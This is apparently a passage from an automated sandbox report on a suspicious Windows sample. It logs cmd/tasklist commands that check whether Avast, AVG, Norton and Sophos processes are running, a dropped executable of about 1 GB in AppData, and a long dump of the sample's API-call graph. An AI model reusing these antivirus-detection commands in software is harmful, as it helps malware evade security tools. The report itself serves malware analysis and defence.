                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:35
                                                                                                                                      Start time:04:22:56
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                                                                                                                                      Imagebase:0x7ff649280000
                                                                                                                                      File size:106'496 bytes
                                                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:36
                                                                                                                                      Start time:04:22:56
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\find.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:find /I "avastui.exe"
                                                                                                                                      Imagebase:0x7ff6b8ea0000
                                                                                                                                      File size:17'920 bytes
                                                                                                                                      MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:37
                                                                                                                                      Start time:04:22:56
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                                                                                                                                      Imagebase:0x7ff7d8b00000
                                                                                                                                      File size:289'792 bytes
                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:38
                                                                                                                                      Start time:04:22:56
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:39
                                                                                                                                      Start time:04:22:57
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                                                                                                                                      Imagebase:0x7ff649280000
                                                                                                                                      File size:106'496 bytes
                                                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:40
                                                                                                                                      Start time:04:22:57
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\find.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:find /I "avgui.exe"
                                                                                                                                      Imagebase:0x7ff6b8ea0000
                                                                                                                                      File size:17'920 bytes
                                                                                                                                      MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:41
                                                                                                                                      Start time:04:22:57
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                                                                                                                                      Imagebase:0x7ff7d8b00000
                                                                                                                                      File size:289'792 bytes
                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:42
                                                                                                                                      Start time:04:22:57
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:43
                                                                                                                                      Start time:04:22:57
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                                                                                                                                      Imagebase:0x7ff649280000
                                                                                                                                      File size:106'496 bytes
                                                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:44
                                                                                                                                      Start time:04:22:57
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\find.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:find /I "nswscsvc.exe"
                                                                                                                                      Imagebase:0x7ff6b8ea0000
                                                                                                                                      File size:17'920 bytes
                                                                                                                                      MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:45
                                                                                                                                      Start time:04:22:57
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                                                      Imagebase:0x7ff7d8b00000
                                                                                                                                      File size:289'792 bytes
                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:46
                                                                                                                                      Start time:04:22:57
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:47
                                                                                                                                      Start time:04:22:57
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                                                      Imagebase:0x7ff649280000
                                                                                                                                      File size:106'496 bytes
                                                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:48
                                                                                                                                      Start time:04:22:57
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\find.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:find /I "sophoshealth.exe"
                                                                                                                                      Imagebase:0x7ff6b8ea0000
                                                                                                                                      File size:17'920 bytes
                                                                                                                                      MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:49
                                                                                                                                      Start time:04:23:02
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe"
                                                                                                                                      Imagebase:0x820000
                                                                                                                                      File size:1'063'239'551 bytes
                                                                                                                                      MD5 hash:C12ED31F29EF510393AE36661F44F102
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Has exited:false

                                                                                                                                      Disassembly

                                                                                                                                      Reset < >

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:17.7%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:21%
                                                                                                                                        Total number of Nodes:1482
                                                                                                                                        Total number of Limit Nodes:28
                                                                                                                                        execution_graph 4201 402fc0 4202 401446 18 API calls 4201->4202 4203 402fc7 4202->4203 4204 401a13 4203->4204 4205 403017 4203->4205 4206 40300a 4203->4206 4208 406831 18 API calls 4205->4208 4207 401446 18 API calls 4206->4207 4207->4204 4208->4204 4209 4023c1 4210 40145c 18 API calls 4209->4210 4211 4023c8 4210->4211 4214 407296 4211->4214 4217 406efe CreateFileW 4214->4217 4218 406f30 4217->4218 4219 406f4a ReadFile 4217->4219 4220 4062cf 11 API calls 4218->4220 4221 4023d6 4219->4221 4224 406fb0 4219->4224 4220->4221 4222 406fc7 ReadFile lstrcpynA lstrcmpA 4222->4224 4225 40700e SetFilePointer ReadFile 4222->4225 4223 40720f CloseHandle 4223->4221 4224->4221 4224->4222 4224->4223 4226 407009 4224->4226 4225->4223 4227 4070d4 ReadFile 4225->4227 4226->4223 4228 407164 4227->4228 4228->4226 4228->4227 4229 40718b SetFilePointer GlobalAlloc ReadFile 4228->4229 4230 4071eb lstrcpynW GlobalFree 4229->4230 4231 4071cf 4229->4231 4230->4223 4231->4230 4231->4231 4232 401cc3 4233 40145c 18 API calls 4232->4233 4234 401cca lstrlenW 4233->4234 4235 4030dc 4234->4235 4236 4030e3 4235->4236 4238 405f7d wsprintfW 4235->4238 4238->4236 4239 401c46 4240 40145c 18 API calls 4239->4240 4241 401c4c 4240->4241 4242 4062cf 11 API calls 4241->4242 4243 401c59 4242->4243 4244 406cc7 81 API calls 4243->4244 4245 401c64 4244->4245 4246 403049 4247 401446 18 API calls 4246->4247 4248 403050 4247->4248 4249 406831 18 API calls 4248->4249 4250 401a13 4248->4250 4249->4250 4251 40204a 4252 401446 18 API calls 4251->4252 4253 402051 IsWindow 4252->4253 4254 4018d3 4253->4254 4255 40324c 4256 403277 4255->4256 4257 40325e SetTimer 4255->4257 4258 4032cc 4256->4258 4259 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4256->4259 4257->4256 4259->4258 4260 4022cc 4261 40145c 18 API calls 4260->4261 4262 4022d3 4261->4262 4263 406301 2 API calls 4262->4263 4264 4022d9 4263->4264 4266 4022e8 4264->4266 4269 405f7d wsprintfW 4264->4269 4267 4030e3 4266->4267 4270 405f7d wsprintfW 4266->4270 4269->4266 4270->4267 4271 4030cf 4272 40145c 18 API calls 4271->4272 4273 4030d6 4272->4273 4275 4030dc 4273->4275 4278 4063d8 GlobalAlloc lstrlenW 4273->4278 4276 4030e3 4275->4276 4305 405f7d wsprintfW 4275->4305 4279 406460 4278->4279 4280 40640e 4278->4280 4279->4275 4281 40643b GetVersionExW 4280->4281 4306 406057 CharUpperW 4280->4306 4281->4279 4282 40646a 4281->4282 4283 406490 LoadLibraryA 4282->4283 4284 406479 4282->4284 4283->4279 4287 4064ae GetProcAddress GetProcAddress GetProcAddress 4283->4287 4284->4279 4286 4065b1 GlobalFree 4284->4286 4288 4065c7 LoadLibraryA 4286->4288 4289 406709 FreeLibrary 4286->4289 4290 406621 4287->4290 4294 4064d6 4287->4294 4288->4279 4292 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4288->4292 4289->4279 4291 40667d FreeLibrary 4290->4291 4293 406656 4290->4293 4291->4293 4292->4290 4297 406716 4293->4297 4302 4066b1 lstrcmpW 4293->4302 4303 4066e2 CloseHandle 4293->4303 4304 406700 CloseHandle 4293->4304 4294->4290 4295 406516 4294->4295 4296 4064fa FreeLibrary GlobalFree 4294->4296 4295->4286 4298 406528 lstrcpyW OpenProcess 4295->4298 4300 40657b CloseHandle CharUpperW lstrcmpW 4295->4300 4296->4279 4299 40671b CloseHandle FreeLibrary 4297->4299 4298->4295 4298->4300 4301 406730 CloseHandle 4299->4301 4300->4290 4300->4295 4301->4299 4302->4293 4302->4301 4303->4293 4304->4289 4305->4276 4306->4280 4307 4044d1 4308 40450b 4307->4308 4309 40453e 4307->4309 4375 405cb0 GetDlgItemTextW 4308->4375 4310 40454b GetDlgItem GetAsyncKeyState 4309->4310 4314 4045dd 4309->4314 4312 40456a GetDlgItem 4310->4312 4325 404588 4310->4325 4317 403d6b 19 API calls 4312->4317 4313 4046c9 4373 40485f 4313->4373 4377 405cb0 GetDlgItemTextW 4313->4377 4314->4313 4322 406831 18 API calls 4314->4322 4314->4373 4315 404516 4316 406064 5 API calls 4315->4316 4318 40451c 4316->4318 4320 40457d ShowWindow 4317->4320 4321 403ea0 5 API calls 4318->4321 4320->4325 4326 404521 GetDlgItem 4321->4326 4327 40465b SHBrowseForFolderW 4322->4327 4323 4046f5 4328 4067aa 18 API calls 4323->4328 4324 403df6 8 API calls 4329 404873 4324->4329 4330 4045a5 SetWindowTextW 4325->4330 4334 405d85 4 API calls 4325->4334 4331 40452f IsDlgButtonChecked 4326->4331 4326->4373 4327->4313 4333 404673 CoTaskMemFree 4327->4333 4338 4046fb 4328->4338 4332 403d6b 19 API calls 4330->4332 4331->4309 4336 4045c3 4332->4336 4337 40674e 3 API calls 4333->4337 4335 40459b 4334->4335 4335->4330 4342 40674e 3 API calls 4335->4342 4339 403d6b 19 API calls 4336->4339 4340 404680 4337->4340 4378 406035 lstrcpynW 4338->4378 4343 4045ce 4339->4343 4344 4046b7 SetDlgItemTextW 4340->4344 4349 406831 18 API calls 4340->4349 4342->4330 4376 403dc4 SendMessageW 4343->4376 4344->4313 4345 404712 4347 406328 3 API calls 4345->4347 4356 40471a 4347->4356 4348 4045d6 4350 406328 3 API calls 4348->4350 4351 40469f lstrcmpiW 4349->4351 4350->4314 4351->4344 4354 4046b0 lstrcatW 4351->4354 4352 40475c 4379 406035 lstrcpynW 4352->4379 4354->4344 4355 404765 4357 405d85 4 API calls 4355->4357 4356->4352 4360 40677d 2 API calls 4356->4360 4362 4047b1 4356->4362 4358 40476b GetDiskFreeSpaceW 4357->4358 4361 40478f MulDiv 4358->4361 4358->4362 4360->4356 4361->4362 4363 40480e 4362->4363 4380 4043d9 4362->4380 4364 404831 4363->4364 4366 40141d 80 API calls 4363->4366 4388 403db1 KiUserCallbackDispatcher 4364->4388 4366->4364 4367 4047ff 4369 404810 SetDlgItemTextW 4367->4369 4370 404804 4367->4370 4369->4363 4372 4043d9 21 API calls 4370->4372 4371 40484d 4371->4373 4389 403d8d 4371->4389 4372->4363 4373->4324 4375->4315 4376->4348 4377->4323 4378->4345 4379->4355 4381 4043f9 4380->4381 4382 406831 18 API calls 4381->4382 4383 404439 4382->4383 4384 406831 18 API calls 4383->4384 4385 404444 4384->4385 4386 406831 18 API calls 4385->4386 4387 404454 lstrlenW wsprintfW SetDlgItemTextW 4386->4387 4387->4367 4388->4371 4390 403da0 SendMessageW 4389->4390 4391 403d9b 4389->4391 4390->4373 4391->4390 4392 401dd3 4393 401446 18 API calls 4392->4393 4394 401dda 4393->4394 4395 401446 18 API calls 4394->4395 4396 4018d3 4395->4396 4397 402e55 4398 40145c 18 API calls 4397->4398 4399 402e63 4398->4399 4400 402e79 4399->4400 4401 40145c 18 API calls 4399->4401 4402 405e5c 2 API calls 4400->4402 4401->4400 4403 402e7f 4402->4403 4427 405e7c GetFileAttributesW CreateFileW 4403->4427 4405 402e8c 4406 402f35 4405->4406 4407 402e98 GlobalAlloc 4405->4407 4410 4062cf 11 API calls 4406->4410 4408 402eb1 4407->4408 4409 402f2c CloseHandle 4407->4409 4428 403368 SetFilePointer 4408->4428 4409->4406 4412 402f45 4410->4412 4414 402f50 DeleteFileW 4412->4414 4415 402f63 4412->4415 4413 402eb7 4416 403336 ReadFile 4413->4416 4414->4415 4429 401435 4415->4429 4418 402ec0 GlobalAlloc 4416->4418 4419 402ed0 4418->4419 4420 402f04 WriteFile GlobalFree 4418->4420 4422 40337f 33 API calls 4419->4422 4421 40337f 33 API calls 4420->4421 4423 402f29 4421->4423 4426 402edd 4422->4426 4423->4409 4425 402efb GlobalFree 4425->4420 4426->4425 4427->4405 4428->4413 4430 404f9e 25 API calls 4429->4430 4431 401443 4430->4431 4432 401cd5 4433 401446 18 API calls 4432->4433 4434 401cdd 4433->4434 4435 401446 18 API calls 4434->4435 4436 401ce8 4435->4436 4437 40145c 18 API calls 4436->4437 4438 401cf1 4437->4438 4439 401d07 lstrlenW 4438->4439 4440 401d43 4438->4440 4441 401d11 4439->4441 4441->4440 4445 406035 lstrcpynW 4441->4445 4443 401d2c 4443->4440 4444 401d39 lstrlenW 4443->4444 4444->4440 4445->4443 4446 402cd7 4447 401446 18 API calls 4446->4447 4449 402c64 4447->4449 4448 402d17 ReadFile 4448->4449 4449->4446 4449->4448 4450 402d99 4449->4450 4451 402dd8 4452 4030e3 4451->4452 4453 402ddf 4451->4453 4454 402de5 FindClose 4453->4454 4454->4452 4455 401d5c 4456 40145c 18 API calls 4455->4456 4457 401d63 4456->4457 4458 40145c 18 API calls 4457->4458 4459 401d6c 4458->4459 4460 401d73 lstrcmpiW 4459->4460 4461 401d86 lstrcmpW 4459->4461 4462 401d79 4460->4462 4461->4462 4463 401c99 4461->4463 4462->4461 4462->4463 4464 4027e3 4465 4027e9 4464->4465 4466 4027f2 4465->4466 4467 402836 4465->4467 4480 401553 4466->4480 4468 40145c 18 API calls 4467->4468 4470 40283d 4468->4470 4472 4062cf 11 API calls 4470->4472 4471 4027f9 4473 40145c 18 API calls 4471->4473 4477 401a13 4471->4477 4474 40284d 4472->4474 4475 40280a RegDeleteValueW 4473->4475 4484 40149d RegOpenKeyExW 4474->4484 4476 4062cf 11 API calls 4475->4476 4479 40282a RegCloseKey 4476->4479 4479->4477 4481 401563 4480->4481 4482 40145c 18 API calls 4481->4482 4483 401589 RegOpenKeyExW 4482->4483 4483->4471 4487 4014c9 4484->4487 4492 401515 4484->4492 4485 4014ef RegEnumKeyW 4486 401501 RegCloseKey 4485->4486 4485->4487 4489 406328 3 API calls 4486->4489 4487->4485 4487->4486 4488 401526 RegCloseKey 4487->4488 4490 40149d 3 API calls 4487->4490 4488->4492 4491 401511 4489->4491 4490->4487 4491->4492 4493 401541 RegDeleteKeyW 4491->4493 4492->4477 4493->4492 4494 4040e4 4495 4040ff 4494->4495 4501 40422d 4494->4501 4497 40413a 4495->4497 4525 403ff6 WideCharToMultiByte 4495->4525 4496 404298 4498 40436a 4496->4498 4499 4042a2 GetDlgItem 4496->4499 4505 403d6b 19 API calls 4497->4505 4506 403df6 8 API calls 4498->4506 4502 40432b 4499->4502 4503 4042bc 4499->4503 4501->4496 4501->4498 4504 404267 GetDlgItem SendMessageW 4501->4504 4502->4498 4507 40433d 4502->4507 4503->4502 4511 4042e2 6 API calls 4503->4511 4530 403db1 KiUserCallbackDispatcher 4504->4530 4509 40417a 4505->4509 4510 404365 4506->4510 4512 404353 4507->4512 4513 404343 SendMessageW 4507->4513 4515 403d6b 19 API calls 4509->4515 4511->4502 4512->4510 4516 404359 SendMessageW 4512->4516 4513->4512 4514 404293 4517 403d8d SendMessageW 4514->4517 4518 404187 CheckDlgButton 4515->4518 4516->4510 4517->4496 4528 403db1 KiUserCallbackDispatcher 4518->4528 4520 4041a5 GetDlgItem 4529 403dc4 SendMessageW 4520->4529 4522 4041bb SendMessageW 4523 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4522->4523 4524 4041d8 GetSysColor 4522->4524 4523->4510 4524->4523 4526 404033 4525->4526 4527 404015 GlobalAlloc WideCharToMultiByte 4525->4527 4526->4497 4527->4526 4528->4520 4529->4522 4530->4514 4531 402ae4 4532 402aeb 4531->4532 4533 4030e3 4531->4533 4534 402af2 CloseHandle 4532->4534 4534->4533 4535 402065 4536 401446 18 API calls 4535->4536 4537 40206d 4536->4537 4538 401446 18 API calls 4537->4538 4539 402076 GetDlgItem 4538->4539 4540 4030dc 4539->4540 4541 4030e3 4540->4541 4543 405f7d wsprintfW 4540->4543 4543->4541 4544 402665 4545 40145c 18 API calls 4544->4545 4546 40266b 4545->4546 4547 40145c 18 API calls 4546->4547 4548 402674 4547->4548 4549 40145c 18 API calls 4548->4549 4550 40267d 4549->4550 4551 4062cf 11 API calls 4550->4551 4552 40268c 4551->4552 4553 406301 2 API calls 4552->4553 4554 402695 4553->4554 4555 4026a6 lstrlenW lstrlenW 4554->4555 4557 404f9e 25 API calls 4554->4557 4559 4030e3 4554->4559 4556 404f9e 25 API calls 4555->4556 4558 4026e8 SHFileOperationW 4556->4558 4557->4554 4558->4554 4558->4559 4560 401c69 4561 40145c 18 API calls 4560->4561 4562 401c70 4561->4562 4563 4062cf 11 API calls 4562->4563 4564 401c80 4563->4564 4565 405ccc MessageBoxIndirectW 4564->4565 4566 401a13 4565->4566 4567 402f6e 4568 402f72 4567->4568 4569 402fae 4567->4569 4571 4062cf 11 API calls 4568->4571 4570 40145c 18 API calls 4569->4570 4577 402f9d 4570->4577 4572 402f7d 4571->4572 4573 4062cf 11 API calls 4572->4573 4574 402f90 4573->4574 4575 402fa2 4574->4575 4576 402f98 4574->4576 4579 406113 9 API calls 4575->4579 4578 403ea0 5 API calls 4576->4578 4578->4577 4579->4577 4580 4023f0 4581 402403 4580->4581 4582 4024da 4580->4582 4583 40145c 18 API calls 4581->4583 4584 404f9e 25 API calls 4582->4584 4585 40240a 4583->4585 4588 4024f1 4584->4588 4586 40145c 18 API calls 4585->4586 4587 402413 4586->4587 4589 402429 LoadLibraryExW 4587->4589 4590 40241b GetModuleHandleW 4587->4590 4591 4024ce 4589->4591 4592 40243e 4589->4592 4590->4589 4590->4592 4594 404f9e 25 API calls 4591->4594 4604 406391 GlobalAlloc WideCharToMultiByte 4592->4604 4594->4582 4595 402449 4596 40248c 4595->4596 4597 40244f 4595->4597 4598 404f9e 25 API calls 4596->4598 4599 401435 25 API calls 4597->4599 4602 40245f 4597->4602 4600 402496 4598->4600 4599->4602 4601 4062cf 11 API calls 4600->4601 4601->4602 4602->4588 4603 4024c0 FreeLibrary 4602->4603 4603->4588 4605 4063c9 GlobalFree 4604->4605 4606 4063bc GetProcAddress 4604->4606 4605->4595 4606->4605 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4607 4048f8 4608 404906 4607->4608 4609 40491d 4607->4609 4610 40490c 4608->4610 4625 404986 4608->4625 4611 40492b IsWindowVisible 4609->4611 4617 404942 4609->4617 4612 403ddb SendMessageW 4610->4612 4614 404938 4611->4614 4611->4625 4615 404916 4612->4615 4613 40498c CallWindowProcW 4613->4615 4626 40487a SendMessageW 4614->4626 4617->4613 4631 406035 lstrcpynW 4617->4631 4619 404971 4632 405f7d wsprintfW 4619->4632 4621 404978 4622 40141d 80 API calls 4621->4622 4623 40497f 4622->4623 4633 406035 lstrcpynW 4623->4633 4625->4613 4627 4048d7 SendMessageW 4626->4627 4628 40489d GetMessagePos ScreenToClient SendMessageW 4626->4628 4630 4048cf 4627->4630 4629 4048d4 4628->4629 4628->4630 4629->4627 4630->4617 4631->4619 4632->4621 4633->4625 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4634 4020f9 GetDC GetDeviceCaps 4635 401446 18 API calls 4634->4635 4636 402116 MulDiv 4635->4636 4637 401446 18 API calls 4636->4637 4638 40212c 4637->4638 4639 406831 18 API calls 4638->4639 4640 402165 CreateFontIndirectW 4639->4640 4641 4030dc 4640->4641 4642 4030e3 4641->4642 4644 405f7d wsprintfW 4641->4644 4644->4642 4645 4024fb 4646 40145c 18 API calls 4645->4646 4647 402502 4646->4647 4648 40145c 18 API calls 4647->4648 4649 40250c 4648->4649 4650 40145c 18 API calls 4649->4650 4651 402515 4650->4651 4652 40145c 18 API calls 4651->4652 4653 40251f 4652->4653 4654 40145c 18 API calls 4653->4654 4655 402529 4654->4655 4656 40253d 4655->4656 4657 40145c 18 API calls 4655->4657 4658 4062cf 11 API calls 4656->4658 4657->4656 4659 40256a CoCreateInstance 4658->4659 4660 40258c 4659->4660 4661 4026fc 4663 402708 4661->4663 4664 401ee4 4661->4664 4662 406831 18 API calls 4662->4664 4664->4661 4664->4662 3808 4019fd 3809 40145c 18 API calls 3808->3809 3810 401a04 3809->3810 3813 405eab 3810->3813 3814 405eb8 GetTickCount GetTempFileNameW 3813->3814 3815 401a0b 3814->3815 3816 405eee 3814->3816 3816->3814 3816->3815 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 